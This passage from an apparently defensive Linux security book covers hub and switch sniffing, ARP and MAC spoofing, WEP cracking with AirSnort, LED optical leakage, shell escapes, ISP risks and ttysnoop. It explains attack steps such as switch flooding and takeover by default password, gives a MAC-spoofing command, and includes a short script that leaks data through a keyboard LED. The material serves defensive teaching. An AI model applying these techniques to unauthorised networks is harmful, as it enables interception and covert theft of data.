Many experienced SysAdmins wanting to use a third system to sniff traffic between two other systems know to use a hub between them instead of a switch. This is because the hub will broadcast traffic to all of the connected systems, while a switch will forward traffic only to the port that the destination system is on (except for broadcast packets). For those mixing 10Base-T and 100Base-TX systems, however, a surprise awaits.

Most 10/100 hubs actually consist of a 10Base-T hub and a 100Base-TX hub connected together internally by a switch. Each system is electrically connected to the appropriate hub within the box. Thus, if one is using an old 10Base-T system to sniff traffic between two 100Base-TX systems, one will see only the broadcasts. This problem occurs, too, when using a 100Base-TX system to sniff traffic between 10Base-T systems. The best solution, therefore, is to make the three systems consistent with each other: all 100Base-TX or all 10Base-T.

One alternate solution is to configure one of the 100Base-TX systems to operate as a 10Base-T system. Another solution is to use a 10Base-T-only hub, because this forces all systems to operate as 10Base-T systems. Yet another solution, if the only 10Base-T system of the three is not the sniffing system, is to put the 10Base-T system on a second 10/100 hub or switch with that second hub or switch connected to the 10/100 hub to which the other two systems are connected. This last solution works because the second hub or switch appears to be a 100Base-TX device to the first 10/100 hub. Since all three devices of interest on it (one system being monitored, the sniffing system, and the second 10/100 hub or switch) are 100Base-TX devices, all traffic between them will be broadcast.

Lastly, many Ethernet drivers for Linux allow forcing a 10/100 card to 10Base-T mode. Windows users can use the Control Panel's Network and Dial-up Connections item to do this, and Mac users can use the Apple System Profiler. Consult the Ethernet HOWTO.

Unlike a hub, a switch observes incoming traffic coming from each cable (port) and builds a database detailing which system is on what cable. Thus, when a packet is received, the switch sends the packet exclusively via the cable that the destination system has been mapped to in the switch's database. Is this the end of the problem? Is the switch's database big enough to keep up with lots of updates under maximum load? How is it structured? What happens if it overflows or suffers from other limitations or attacks? What are the consequences of using multiple switches?

The answers depend on how a particular model and brand of switch is designed. Most "fail open." This means that if a switch's cache is full and a destination address has not yet been stored or if the switch is too busy to determine which cable links to the destination system, the data will be broadcast to all systems. In other words, the switch falls back to being a hub, broadcasting all data. How big is that database and how easy is it for a cracker to overflow it and destroy your intended switch-based "physical" security? To detect this sort of attack, I highly recommend Arpwatch.

Most switches, even low-end ones, can accommodate a minimum of 8,000 MAC addresses. Long before that level is reached, Arpwatch should have gotten your attention unless the cracker is careful enough to limit his packets to nonbroadcasts with destinations behind the same switch.

Arpwatch is open-source software, created by the U.S. government's Lawrence Berkeley Labs. I have made major enhancements to Arpwatch and my version is on the CD-ROM. I discuss its use in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Forcing almost any switch to act as a hub is trivial. A cracker just floods the network with packets containing different spoofed source and destination IP or MAC addresses while sniffing. She will need to filter out her own noise, but that is as simple as using a destination port that she is not interested in. An even better approach the cracker might take is to gain control of the switch and tell it where to deliver traffic.

The security problem of "sniffing" caused people to change from coax Ethernet to switches with a separate cable to each system. In a classic "failure to learn from history" lesson, this wisdom regarding sniffing has been lost in the rapid transition to wireless networks, which essentially have no defense against sniffing. The much-discussed Wired Equivalent Privacy (WEP) encryption can be cracked in about eight hours of passive monitoring by any cracker. (See "Wired Equivalent Privacy (WEP)" on page 153 for details on wireless security.)

Some switches are configurable by the system or network administrator. Many administrators have not bothered to change the password from the vendor's default. It took me only a minute with Google to find a list of the default passwords for hundreds of popular switches from major manufacturers. Even switches with decent (but not great) passwords can be cracked over time. Will you be alerted if one of your switches is under siege by a brute-force password guessing attack? When multiple switches are involved, the problems multiply as each one passes on just the information it thinks is appropriate. This can make the analysis of possibilities and countering them challenging.

It may not take even an ARP attack against a switch to allow a cracker access to the raw packets on your network. Many advanced switches have a monitor capability, allowing you to monitor traffic on one or more ports on the switch. A designated monitor port can be set in one of three monitoring modes.

  • Monitor another port—essentially in "parallel" with that port.

  • Monitor a given 802.1q vlan.

  • Monitor all ports on the switch.

By grabbing the admin IP of the switch and then using default passwords (shame on your SysAdmin for not changing them), a hacker can configure the monitor port to be hers and can view data bound for other systems. There are some switches that can restrict where administration connections can originate by IP or switch port. Check the documentation for your switch to see if it has this feature. Never forget that switches have software too, and as we all know—repeat it with me—"all software has bugs."

A cracker (operating from a system on your LAN, of course) does not need to bother with switch password cracking, though. He merely determines the MAC and IP addresses of your firewall, router, server, or other system of interest. Then he sends a packet using his MAC address and the IP address of the system he is attacking as the source address. The switch will see the packet and update its database. Any future traffic with a destination IP of your system being attacked will be sent to the compromised system under the cracker's control. He then can sniff each packet easily, alter it as he desires, and forward the altered packet to its rightful owner without your noticing. I discuss solutions in the next section.

3.4.18 Countering System and Switch Hacking Caused by ARP Attacks

DANGER LEVEL

All of the solutions in this section may be used together to best defend against switch hacking and other ARP (MAC) attacks. Good encryption techniques, such as those offered by SSH, SSL, and IPSec (FreeS/WAN), will prevent crackers from seeing or altering the confidential data that can travel over the network. Unfortunately, this is impractical for many protocols (e.g., HTTP, SMTP, and, in many environments, DNS). Worse, encryption offers no help for Denial of Service (DoS) attacks in which a cracker generates packets to reroute traffic intended for other systems to her system's MAC or to nonexistent addresses.

Many of the fancier switches allow the administrator to create a permanent database to map IP addresses to MAC addresses. Using this should prevent a cracker from overflowing the switch's database to force it to fail open and operate as a hub. It will not work, however, for sites using DHCP without static MAC to IP mappings. For a large site it may be too much work to build such a "hardwired" mapping in each switch even if the mappings are static.

Some switches offer a good compromise. The compromise is to allow the dynamic building of the mapping, but once a given MAC address is seen on a particular port, all subsequent data for that MAC will go there, making hijacking difficult. If a system is moved, the administrator will need to log into the switch and tweak its configuration, but this is a rare event.

However, about 50 percent of the NICs (Ethernet cards) made allow their MAC addresses to be changed under software control, allowing an attacker to defeat the nonchangeable MAC to IP mapping by using a new random MAC address. If the new packets get to the system running Arpwatch, they will be detected. One solution is to purchase only NICs that do not have this capability. A vendor should be able to tell you if its card can do this, though the capability also requires driver support. Certainly, this capability can be tested under Linux with the command

ifconfig eth0 hw ether 00:0A:0B:0C:0D:0E

Then do a ping to a second system, and on that system observe the new MAC address either with Arpwatch or with

arp -vna

NICs believed to support changing the MAC address this way under Linux are listed in Table 3.1. This list is neither complete nor 100 percent accurate. Searching the kernel driver source for the phrase set_mac_address will indicate whether a card not listed here supports this capability. Their drivers under other operating systems probably support changing the MAC address too. On Macs, inspecting the Apple System Profiler may indicate this capability. Under Windows, viewing the Control Panel's Network and Dialup Connections item may suggest this.

The cards listed in Table 3.2 do not appear to support changing the MAC address under software control.

Another good solution is to segment the organization's network into different subnets separated by firewalls (or separated onto different interfaces of the same carefully designed firewall). A decently configured Linux firewall will not allow such MAC attacks to travel through it because it blocks packets with rogue IP addresses and thus prevents someone on one subnet from spoofing an IP that belongs on a different subnet. Linux also allows the MAC-to-IP mappings to be "hardwired" by the SysAdmin so that they will be permanent (until the next reboot). See "Intracompany Firewalls to Contain Fires" on page 84 and "Preventing ARP Cache Poisoning" on page 146 for details.

The solutions already discussed counteract switch poisoning, but they are not 100 percent effective nor do they warn you when your network is under attack. For these reasons, I strongly suggest that you also use an Intrusion Detection System to warn you of attacks and to help track down attackers.

3.4.19 Wired Equivalent Privacy (WEP)

DANGER LEVEL

Wireless networking recently has begun to gain wider acceptance in the marketplace and, as a result, new security challenges have emerged. The term Wired Equivalent Privacy (WEP) was coined by the vendors' association to alleviate users' fears that their data broadcast over wireless networks would not remain private. However, I consider relying on WEP on a Wi-Fi wireless network to be accepting Wireless Equivalent Plundering of your data. WEP is a marketing name, not a technical description of the security level. It takes a national security agency or an elite private consultant to sniff what little data leaks off a conventional wired network.

However, sniffing data from a wireless network protected by WEP requires nothing more than a Linux laptop with an ordinary Wi-Fi network card, a coffee can formed into a directional antenna, and AirSnort running on the laptop for several hours. Will using WEP save you? The answer is no. A cracker looking for targets of opportunity need only drive around any large city with her AirSnort operational and aim the coffee can antenna at any building being passed.

This is known as Wardriving and is surprisingly effective. The subsequent cracking of discovered networks can be done from a parked vehicle, another company in the building, at a sales seminar to which the public has been invited, or at the coffee shop down the block. AirSnort needs to receive about 7 million encrypted packets. When it has received them, it takes but a second to recover the private keys so that two-way access to the network is obtained. Worse, recent articles appearing on major Linux Web sites and elsewhere confirm that the wireless networks at many large companies and other organizations do not even use WEP, allowing immediate stealth compromise and data injection.

But could all this be just the ranting of the paranoid? Has the author seen too much of the X-Files? The U.S. government's National Infrastructure Protection Center (NIPC) "serves as a national critical infrastructure threat assessment, warning, vulnerability, and law enforcement investigation and response entity." It had this to say:

Wireless networking offers great convenience for mobile users, although the technology's immaturity has led to serious security concerns that must be addressed.

NIPC gives more technical advice in its online document BEST PRACTICES FOR WIRELESS FIDELITY (802.11b) NETWORK VULNERABILITIES, currently available at www.nipc.gov/publications/nipcpub/bestpract.html. It points out that a wireless local area network (WLAN) is a radio station broadcasting the data and that anyone nearby can intercept it. It notes that the effective transmission range can be from a few hundred feet to an entire campus. It reports that a group of experts announced in August 2001 that it had defeated WEP, and that various hacker tools for exploitation are on public Web sites. It further notes the following.

Successful exploitation of the vulnerability [in WEP] has been simplified to getting within range to intercept the broadcast.

This NIPC page then quotes the recommendations of the Wireless Ethernet Compatibility Alliance (WECA); I have added my comments in italic.

  1. Turn WEP on and manage your WEP key by changing the default key and, subsequently, changing the WEP key,[sic] daily to weekly.

    So any key used for more than a day is at risk for being cracked?

  2. Password protect drives and folders.

    Can't WEP be trusted at all?

  3. Change the default SSID (Wireless Network Name).

    Default passwords are covered in "The Seven Most Deadly Sins" on page 27.

  4. Use session keys if available in your product.

    So a cracker can alter your data en route or inject his own?

  5. Use MAC address filtering if available in your product.

    It is trivial for a Hacker to use one of your MAC addresses after crashing its legitimate owner wirelessly and effortlessly.

  6. Use a VPN system...

For larger organizations, or where the value of the data justifies strong protection by a small business or home user, the WECA statement provides examples of additional security methods.

So, do not trust any data sent over Wi-Fi, even if protected by WEP, unless it is encrypted? Wow! If that does not scare your boss, show it to the organization's legal department.

Wireless Recommendation

Use wireless communications only with suitably strong encryption. This might be the use of SSH clients or VPN endpoints on the client systems. While you might consider unencrypted wireless communications safe for nonconfidential traffic, I would consider the risk too great: even downloaded e-mail or browsed URLs can show a competitor what your company's new product research areas are. See "Protecting User Sessions with SSH" on page 409 and "Virtual Private Networks (VPNs)" on page 422.

If your management still does not believe how insecure WEP is, act as your own white hat (with written management permission). Download it yourself from

http://airsnort.shmoo.com

and prove it. In fact, this sniffing also should be done regularly to discover any unauthorized access points that employees may have installed for their own convenience. The convenience of this technology is far outweighed by the risks for many uses, unless suitably strong encryption—stronger than WEP—is used.

3.4.20 Hacking LEDs

DANGER LEVEL

The transmit and receive LEDs on virtually all modems broadcast the data being transmitted and received to anyone who can see them. In the paper "Information Leakage from Optical Emanations," by Joe Loughry of Lockheed Martin Space Systems and David A. Umphress of Auburn University, usable signals were received from 65 feet away using an inexpensive 4-inch telescope and phototransistor; a 1-foot telescope should work from 260 feet away. Because they use latching circuitry to make the lights more visible, none of the Ethernet switches tested had this vulnerability.

However, an enterprising cracker easily could modify one and send it to you as part of a "sales promotion" and wait for you to deploy it. He could also be more subtle and replace the optical LED with an infrared one or add the infrared one next to an existing one. The solution is the same one that dancers use to avoid suffering the painful Blues. Apply black electrical tape over the LEDs.

The same technique can be used to receive data from the LEDs on every PC keyboard. These can be made to flash under software control with the setleds command, giving a cracker a novel way to get information out of your organization even if no unencrypted connection to the Internet exists. A program could send data through the LEDs at 150 bps. Running X may interfere with this command, but it worked on my firewall. Alternatively, by moving one wire within almost any keyboard case, one of the LEDs may be made to transmit every keystroke; a bogus "recall campaign" could be used to get such modified keyboards into place.
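
To see that the keyboard LEDs really are under software control, here is a minimal sketch that clocks the bits of a short message out through the Scroll Lock LED on a Linux virtual console. It is illustrative only, assumes the setleds and xxd commands are available, and runs far slower than the 150 bps mentioned above; a real covert channel would need much tighter timing and a matching optical receiver.

    #!/bin/bash
    # Illustrative only: flash a short message's bits on the Scroll Lock LED.
    # Run on a virtual console, not under X.
    msg="hi"
    bits=$(printf '%s' "$msg" | xxd -b -c1 | awk '{print $2}' | tr -d '\n')
    for b in $(printf '%s' "$bits" | fold -w1); do
        if [ "$b" = 1 ]; then setleds -F +scroll; else setleds -F -scroll; fi
        sleep 1          # about 1 bit per second; 150 bps needs far finer timing
    done
    setleds -F -scroll   # leave the LED off when finished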

Wireless keyboards and mice usually send the signal via an infrared LED that should be readable from quite a distance with an inexpensive telescope and phototransistor, or from a sensor within the room. These signals are not encrypted. The LED upload/download ports on laptops and PDAs can be attacked easily on airliners and in other public places. The reflected glow of a CRT off any convenient object can be read at a distance in the same way; this technique for reading CRTs has recently been demonstrated by Professor Kuhn of Cambridge University.

3.4.21 Shell Escapes

DANGER LEVEL

If you are setting up accounts with restricted access, for example, no normal command shell, be sure that any commands that the account users use do not offer a shell escape. Such an escape can be used to circumvent whatever restrictions you intended. Steve Friedl's publicizing of a well-known company's failure to consider this escape capability in the more program and the subsequent major security problem created quite a stir. Some of the programs with shell escapes include Mail, cu, groff, ispell, less, more, telnet, tin, trn, and vi.

Shell escapes can be hard or impossible to disable without source code modification because many programs were not designed to suppress them. The Linux philosophy is to trust a user to do anything he wants to his own files. This should be considered a case of not using the program properly, rather than there being a bug in the program. Most of the programs were not designed to be used by users not trusted with their own files or world-accessible files. Some programs have a command-line argument to disable all escapes and some others might be fooled into disabling the shell escape in an ad hoc manner.

For example, the more program has both a direct shell escape using "!" and a subtle indirect one: an escape to vi, which itself has a shell escape. This indirect escape shows the danger of relying on ad hoc fixes and the risks of using software differently from the way it was intended. Though more has no command-line arguments to turn these escapes off, it does use environment variables, $SHELL, $VISUAL, and $EDITOR, to specify which shell and editor to invoke.
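
Here is a hedged sketch of that environment variable trick applied to more: point the shell and editor variables at a harmless program before invoking it, so the "!" and editor escapes have nothing dangerous to run. It is fragile (miss one variable or one escape and the hole is back) and, as discussed next, no substitute for a stronger solution.

    # Neuter more's escapes by pointing its shell and editor at /bin/false.
    # A sketch only; /etc/motd stands in for whatever file is being viewed.
    env SHELL=/bin/false VISUAL=/bin/false EDITOR=/bin/false more /etc/motd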

Some other programs can be secured using this environment variable trick, but there is a large danger of overlooking something and causing a severe security hole. Many programs, with vi being a prime example, allow the user to specify an alternate file to work with from the user prompt, providing a security hole when used in the way discussed here. Many have found ingenious ways to subvert even the most hardened scripts.

This is a job for chroot. Place the nonroot user in a chroot "prison" with the files and directories owned by root, no world-write permission, and no set-UID programs. The user will not be "breaking out." See "Defeating the chroot() Vulnerability" on page 319 for ways a cracker might still escape and the defenses against them.
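
The following is a minimal sketch of such a prison, assuming the restricted account needs only a shell and ls; the paths and list of binaries are illustrative, and a real jail also needs whatever shared libraries ldd reports for each binary copied in.

    # Build a bare-bones chroot prison owned entirely by root (run as root).
    JAIL=/home/jail
    mkdir -p $JAIL/bin $JAIL/lib $JAIL/dev $JAIL/etc $JAIL/home/guest
    cp /bin/sh /bin/ls $JAIL/bin/                 # only the tools required
    # Copy in the shared libraries these need (see: ldd /bin/sh; ldd /bin/ls).
    chown -R root:root $JAIL                      # everything owned by root
    chmod -R go-w $JAIL                           # no group- or world-write
    find $JAIL -perm -4000 -exec chmod u-s {} \;  # strip any set-UID bits
    chroot $JAIL /bin/sh                          # start the restricted session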

3.4.22 Your ISP

DANGER LEVEL

In a number of reports, crackers were unable to break into well-secured target sites. They got around this by breaking into the sites' ISPs first. The reports did not give details but we can take some guesses. A site's packets typically will be routed through the site's ISP, then through a backbone or two such as MCI or Sprint, the remote organization's ISP, and the remote organization's site. Besides the sites on either end, only their ISPs and the backbones are points of attack for packet sniffing.

Many people with personal ISP service or small business accounts will receive their e-mail at the ISP and download it via POP (Post Office Protocol) or IMAP. Certainly, this e-mail is stored at the ISP unencrypted. This allows a cracker who cracks the ISP to access, alter, or remove any e-mail. What can you do to ensure the safety of packets at your ISP? First, use the attack paths method, discussed in "Attack Paths" on page 23, to analyze your situation for vulnerability. Clearly, a major risk is e-mail stored at the ISP, because the cracker does not have to be "listening" at the time a packet transits the site. Instead, a periodic scan of the mailbox will do.

The best solution to the mail problem is to encrypt all e-mail with PGP and agree that the recipient will acknowledge receipt of all important e-mail. Although this is a great idea for those with whom your users regularly correspond, it is impractical in the general case. A business cannot require all prospective customers to use PGP, nor could it easily ascertain that the public keys were valid. For the general case, if you are concerned about security at your ISP, avoiding the ISP's POP servers is preferable. Instead, for those with continuous connections, try to get the ISP to allow port 25 (SMTP) traffic to pass directly to your mail server; this way the mail does not remain on the ISP's system for any length of time. Some ISPs will not do this for noncommercial (home) accounts.

For these, the solution is a frequent invocation of the appropriate POP client, perhaps every 10–30 minutes. Certainly, if this is being done due to security concerns, an SSL-wrapped or SSH-wrapped protocol or equivalent should be used. It is assumed that your users are using SSH-wrapped or SSL-wrapped services wherever possible. A talented cracker will be able to intercept your e-mail before it gets to your mailbox on the ISP's system. PGP and the policy of acknowledging receipt of important e-mail (and expecting that acknowledgment) are the only antidote to this for e-mail.
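
As one hedged example of this frequent, encrypted polling, fetchmail can retrieve POP3 over SSL from cron every 15 minutes; the host name and user here are placeholders for whatever your ISP actually provides.

    # ~/.fetchmailrc (mode 600), with placeholder host and user:
    #   poll pop.example-isp.net protocol pop3 user "jdoe" ssl
    # crontab entry to poll every 15 minutes:
    */15 * * * *   /usr/bin/fetchmail --silent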

Some Web merchants avoid the security and reliability problems of e-mail by offering a secure messaging system between their clients and themselves. It is wrapped in SSL to avoid sniffing or other interception or loss of messages. This is an excellent solution.

Besides e-mail attacks, all manner of sniffing and "Man-in-the-middle" attacks are possible. "Man-in-the-Middle Attack" on page 257 explains this attack and offers solutions, all of which involve secure encryption of data. In addition to these problems, often the ISP provides primary or secondary DNS service. This offers the cracker the opportunity to alter the DNS entries to point at their system or a third party's system. This will allow the cracker to forge your site, possibly getting customer data, but more likely, simply shutting down access to it.

There are various ways to check out how careful your ISP (or potential ISP) is about security. Certainly, the smaller your organization is and the larger your ISP is, the less they will be willing to take the time to talk about security. Small ISPs generally will have fewer resources to devote to security, though some really big ones do not seem to care; I'm not naming names.

Try doing some searches. I tried

Mindspring near (security or intrusion or breach)

on AltaVista's advanced search. When I did this for MindSpring (now EarthLink), my ISP, I found it listed as one of the principal clients for SecureWare's (now S1 Technologies') firewall product, along with one of the largest U.S. accounting firms and others in that arena. This is not surprising because MindSpring is a spin-off from SecureWare.

SecureWare's original claim to fame was converting UNIX to be a C2-level secure operating system for use by the U.S. government and its defense contractors, and they are very good. I consulted for them a number of times to enhance their secure UNIX kernel and do other security work. None of the other ISPs were using SecureWare's firewall, though they may be using other products.

Finally, go visit the ISP and ask for a tour. Ask to meet the technical people and ask them about security. If they are good, they will be eager to tell you about their security. Ask them about their "abuse" team. Scan the security lists and local Linux and UNIX groups and see if they participate. Decide if they are using an operating system that you consider secure. (EarthLink uses UNIX. Many use Linux. Some use NT.)

Many organizations allow special access from business associates. These may be partners, vendors, or large customers. Before granting this access, it is important that their security be evaluated. If it is weak, a cracker can break into your network through theirs. See also "SSH Dangers" on page 511.

3.4.23 Terminal Sniffing (ttysnoop)

DANGER LEVEL

The ttysnoop program is a powerful tool that may be used for both good and evil, depending on who is using it. It allows the person setting it up to snoop on, or watch, all the data that flows to and from the specified ttys. It requires root privileges to install and run. It is useful to a SysAdmin who suspects that someone is up to no good, because it lets the SysAdmin monitor that person's activities for improper actions and store all of them on disk. It can monitor any tty device, including those used by virtual terminals and those that telnet uses.

Of course, if a cracker installs it, she can see all your keystrokes, including your password as you type it. SSH is not a defense against such an attack on the client system, because ttysnoop intercepts your data before it reaches SSH to be encrypted. The ttysnoop package includes good documentation and may be obtained from several sources, including

ftp://contrib.redhat.com/pub/contrib/libc6/SRPMS/ttysnoop-0.12c-5.src.rpm
www.debian.org/Packages/unstable/admin/ttysnoop.html

3.4.24 Star Office

DANGER LEVEL

A friend reports that when his "tasks" failed, he went troubleshooting. When he looked at the properties of the "tasks" icon on the desktop, his password was there in plain text in the program invocation. Because Star Office emulates Microsoft's Office products, it may emulate their security model too.

However, the Star Office folks are smart enough not to emulate Word's defaulting to enabling macros (as of Star Office 6.2). Unless this default is changed, it protects Star Office users from macro viruses. Still, I recommend saving Word documents coming from the Internet to a file and viewing them from a different "throwaway" account that has no important data or access to same.

3.4.25 VMware, Wine, DOSemu, and Friends

DANGER LEVEL

VMware is a commercial product that provides an emulation of PC hardware in order to run a guest operating system, such as Windows, on top of the native operating system. It needs to run as root because it must access hardware directly. There is the obvious issue that if hardware access is given to a guest operating system, that hardware is no more secure than the guest operating system itself. Additionally, there have been some security problems in VMware reported on the security mailing lists. Those using this commercial product will want to check the archives and do a search using

http://google.com

or

http://altavista.com

DOSemu, short for DOS emulation, is just that. Most DOS programs will run on it because it emulates the video, system calls, and file system. Similar issues exist with VMware's competitors, as well as with Wine, DOSemu, and the like. Most of these offer some configuration options to improve security. Still, do not trust them to be any more secure than native Windows.
